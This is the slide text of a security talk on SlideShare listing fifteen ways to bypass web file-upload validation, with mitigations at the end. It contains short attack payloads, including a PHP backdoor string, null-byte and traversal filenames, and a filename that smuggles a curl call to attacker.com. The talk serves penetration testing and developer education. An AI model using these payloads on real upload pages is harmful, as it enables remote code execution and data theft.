Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Ebrahim Hegazy
15 Technique to Exploit File Upload Pages
Senior Consultant @ Deloitte
About me
Security Guy!
About me
Top Yahoo Security Researcher
Agenda
• Target of the session
• How file upload pages works?
• Bypassing Developers validation of:
– Filename only (White...
Target of the Session
The main target of this session is:
• Gathering all techniques in one place to aid penetration teste...
Teaser!
File upload pages and its main headers
For every file upload page, there are some headers that always exist. Lets name it ...
Bypassing Developers Validation
Scenarios:
In the coming slides, we will go through different scenarios of how developers ...
Scenario 1 (BlackList)
Blacklisting Dangerous files?
The developer validates that the uploaded file doesn‟t have or contai...
Scenario 2 (Apache-Linux)
Properly Blacklisting .php files
The developer properly validate that the uploaded file doesn‟t ...
Scenario 2 (IIS-Windows)
On windows servers, if the same validation is done for asp pages, we can bypass it using .cer & ....
Scenario 3 (BlackList)
Bypassing all executabel extensions?
In this scenario the developer is black-listing all dangerous ...
Scenario 4
Validating Filename only (Whitelist):
In this scenario, the developer is validating the filename ONLY by Whitel...
Scenario 4
Validating Filename only (Whitelist):
The regex is NOT properly implemented. It validates that the filename con...
Scenario 5
Null Byte Injection
The null character is a control character with the value zero. PHP treats the Null Bytes %0...
Scenario 6
If the application allows upload of .svg images
SVG images are just XML data. Using XML you can achieve lots of...
Scenario 7
Allowing video uploads?
Due to a SSRF vulnerability in ffmpeg library, it is possible to create a video file th...
Scenario 8
Directory Traversal
You can upload your file with the name of “../../../logo.jpg” for example to replace the ma...
Scenario 9
Validating the file content and missing the file-name.
Developer is passing the uploaded file to PHP-GD library...
Scenario 9 POC
Validating the file content and missing the file-name.
Developer is passing the uploaded file to PHP-GD lib...
Scenario 10
Image Tragic Attack
SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for insta...
Scenario 11
Exploiting old IIS servers
IIS in its earlier versions < 7.0 had an issue handling the uploaded files. An atta...
Scenario 12
DOS Attack
Web applications that doesn‟t validate the file-size of the uploaded files are vulnerable to DOS at...
Scenario 13
Magic Numbers
Developers validates the file-contents starts with Magic Numbers and the file-content is set to ...
Scenario 14
OOB SQL Injection via filename:
If the developers are trusting the filenames and pass it directly to the Datab...
Scenario 15
Cross Domain Content Hijacking
When developers are validating the uploaded filename, content-type but missing ...
Conclusion
Suggested techniques of better handling the file-upload pages
• Always use a sandbox domain to store uploaded f...
Stay in Touch!
Twitter: Zigoo0
Email: Ehegazy@deloitte.nl
Site: www.Sec-Down.com
Деякі випадкові
слова, щоб інші
думали, щ...
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
Upcoming SlideShare
Loading in …5
×

of

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 1 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 2 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 3 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 4 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 5 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 6 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 7 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 8 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 9 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 10 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 11 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 12 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 13 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 14 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 15 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 16 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 17 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 18 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 19 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 20 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 21 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 22 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 23 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 24 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 25 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 26 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 27 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 28 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 29 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 30 "15 Technique to Exploit File Upload Pages", Ebrahim Hegazy Slide 31
Upcoming SlideShare
What to Upload to SlideShare
Next

31 Likes

Share

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy

During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy

  1. 1. Ebrahim Hegazy 15 Technique to Exploit File Upload Pages Senior Consultant @ Deloitte
  2. 2. About me Security Guy!
  3. 3. About me Top Yahoo Security Researcher
  4. 4. Agenda • Target of the session • How file upload pages works? • Bypassing Developers validation of: – Filename only (Whitelist) – Filename only (Blacklist) – File Type only – File Contents only – Filename and File-type – File type and File-contents – Filename, File-type and File content – Exploiting Server Side Libraries – Forcing the files to be downloadable not executable – Exploitation of other common developers mistakes • Conclusion
  5. 5. Target of the Session The main target of this session is: • Gathering all techniques in one place to aid penetration testers and bug hunters during their assessments. • Helping developers understand how hackers bypass their validations in order to better protect their Apps.
  6. 6. Teaser!
  7. 7. File upload pages and its main headers For every file upload page, there are some headers that always exist. Lets name it main headers. The main headers are: • File Name • File Type • Magic Number • File Content • File Size
  8. 8. Bypassing Developers Validation Scenarios: In the coming slides, we will go through different scenarios of how developers validates the uploaded files and how Pentesters can bypass it.
  9. 9. Scenario 1 (BlackList) Blacklisting Dangerous files? The developer validates that the uploaded file doesn‟t have or contain .php, PHP, or php5 etc via black-listing technique. Bypass: Above Regex is vulnerable as it doesn‟t check the case insensitivity of file extension. Mitigation: ^.*.(php|php1|php2|php3|php4|php5|php6|php7|phtml|exe)$/i
  10. 10. Scenario 2 (Apache-Linux) Properly Blacklisting .php files The developer properly validate that the uploaded file doesn‟t have or contain .php, PHP, or php5 etc via black-listing technique. How to bypass: We can bypass this validation using the .pht files. The PHT file stores HTML page that includes a PHP script.
  11. 11. Scenario 2 (IIS-Windows) On windows servers, if the same validation is done for asp pages, we can bypass it using .cer & .asa extensions. IIS <= 7.5 have Both *.asp and *.cer mapped to asp.dll, thus executing ASP code.
  12. 12. Scenario 3 (BlackList) Bypassing all executabel extensions? In this scenario the developer is black-listing all dangerous extensions that would allow code execution. But how about using .eml to trigger a Stored XSS? Source: https://jankopecky.net/index.php/2017/04/18/0day-textplain-considered-harmful/
  13. 13. Scenario 4 Validating Filename only (Whitelist): In this scenario, the developer is validating the filename ONLY by Whitelisting .jpg via server-side code, using below Regex
  14. 14. Scenario 4 Validating Filename only (Whitelist): The regex is NOT properly implemented. It validates that the filename contains .jpg but doesn‟t validate that the filename ends with .jpg Moreover on While-listing: ^.*(jpg|gif|png)$i Regex doesn‟t contain Dot, means it only makes sure that file ends with allowed filenames: File.php.jkha11111jpg
  15. 15. Scenario 5 Null Byte Injection The null character is a control character with the value zero. PHP treats the Null Bytes %00 as a terminator (same as C does). Thus, renaming your file to be shell.php%001.jpg or shell.phpx00.jpg shall satisfy the file upload page because the file ends with .jpg, but the file will be treated as .php due to termination of whatever after the Null Byte. Note: renaming the file to shell.phpD.jpg, upload it and then replace the hex represntaion of D with 00 will also work.
  16. 16. Scenario 6 If the application allows upload of .svg images SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance a Stored XSS as below.
  17. 17. Scenario 7 Allowing video uploads? Due to a SSRF vulnerability in ffmpeg library, it is possible to create a video file that when uploaded to any application that supports video files (i.e Youtube, vk, Flicker etc) you will be able to read files from that server when you try to watch the video! Command: ffmpeg -i video.avi{m3u} video.mp4 - https://github.com/neex/ffmpeg-avi-m3u-xbin/
  18. 18. Scenario 8 Directory Traversal You can upload your file with the name of “../../../logo.jpg” for example to replace the main website logo. This issue happens due to lack of validating the filename.
  19. 19. Scenario 9 Validating the file content and missing the file-name. Developer is passing the uploaded file to PHP-GD library to make sure that the uploaded file is an image and doesn‟t contain meta-data, however, not validating the uploaded file name. How to bypass: • We get a normal image, convert it using the php-gd library • Now we have 2 files, we convert it to hex and start searching for identical bytes • When finding the identical bytes, we replace those bytes with out backdoor code (i.e. <?system($GET[„x‟]);?>)
  20. 20. Scenario 9 POC Validating the file content and missing the file-name. Developer is passing the uploaded file to PHP-GD library to make sure that the uploaded file is an image and doesn‟t contain meta-data, however, not validating the uploaded file name. https://secgeek.net/bookfresh-vulnerability/
  21. 21. Scenario 10 Image Tragic Attack SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance ImageMagic which is an image processing library vulnerable to SSRF and RCE vulnerabilities. Source (Facebook RCE): http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
  22. 22. Scenario 11 Exploiting old IIS servers IIS in its earlier versions < 7.0 had an issue handling the uploaded files. An attacker can bypass the file upload pages using filename as: shell.aspx;1.jpg
  23. 23. Scenario 12 DOS Attack Web applications that doesn‟t validate the file-size of the uploaded files are vulnerable to DOS attack as an attacker can upload many large files which will exhaust the server hosting space.
  24. 24. Scenario 13 Magic Numbers Developers validates the file-contents starts with Magic Numbers and the file-content is set to image/gif. Exploit: Uploading shell.php but setting the content type to image/gif and starting the file contants with GIF89a; will do the job! RCE via zip files Developers accepts zip file, but handle filenames via command line. Exploit: Filename;curl attacker.com;pwd.jpg
  25. 25. Scenario 14 OOB SQL Injection via filename: If the developers are trusting the filenames and pass it directly to the Database, this will allow attackers to execute Out of Band SQL Injection. A good scenario would be companies asking you to submit your CV without validating the CV name.
  26. 26. Scenario 15 Cross Domain Content Hijacking When developers are validating the uploaded filename, content-type but missing to validate the uploaded file content. It is possible to upload a Flash file with .jpg extension, then call that flash file with <object tags in your website and Bingo, you are able to do Cross Origin Requests to steal CSRF tokens. How browsers see it? 1. Plugins like Flash doesn't care about the extension or content-type 2. If the file is embeded using <object> tag, it will be executed as a Flash file as long as the file content looks like Flash. https://github.com/nccgroup/CrossSiteContentHijacking
  27. 27. Conclusion Suggested techniques of better handling the file-upload pages • Always use a sandbox domain to store uploaded files • Use CDN servers as it only allows cacheable resources and disable executable files such as php • Rename the uploaded files to some random filenames, remove the file extension and then append your allowed file extension. • Mark all files as downloadable not executable (Content-Deposition) • Validate the file-size.
  28. 28. Stay in Touch! Twitter: Zigoo0 Email: Ehegazy@deloitte.nl Site: www.Sec-Down.com Деякі випадкові слова, щоб інші думали, що я володію українською мовою! Ale ya ne volodiyu :D
  • TinaMclaurin

    Dec. 4, 2021
  • kunal3101

    Apr. 24, 2021
  • HusseinALi1

    Oct. 8, 2020
  • KamalElsayed7

    Oct. 8, 2020
  • AbanobMedhat

    Oct. 3, 2020
  • MubarakArzika

    Jul. 14, 2020
  • MoaazElsayed

    May. 12, 2020
  • KrishanuDhar3

    May. 5, 2020
  • ssusercb9d9f

    Mar. 19, 2020
  • iftequarahmed3

    Dec. 15, 2019
  • baluz1

    Oct. 11, 2019
  • smailDahmoun

    May. 14, 2019
  • diegoh66

    Apr. 16, 2019
  • DelioAlinaTablang

    Feb. 22, 2019
  • GaneshP59

    Jan. 11, 2019
  • AshrafAyad2

    Dec. 20, 2018
  • JohnCook15

    Dec. 6, 2018
  • VonNaturAustreVe

    Nov. 8, 2018
  • AjayKulal

    Oct. 19, 2018
  • danghieupro

    Oct. 16, 2018

During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!

Views

Total views

33,830

On Slideshare

0

From embeds

0

Number of embeds

557

Actions

Downloads

82

Shares

0

Comments

0

Likes

31

×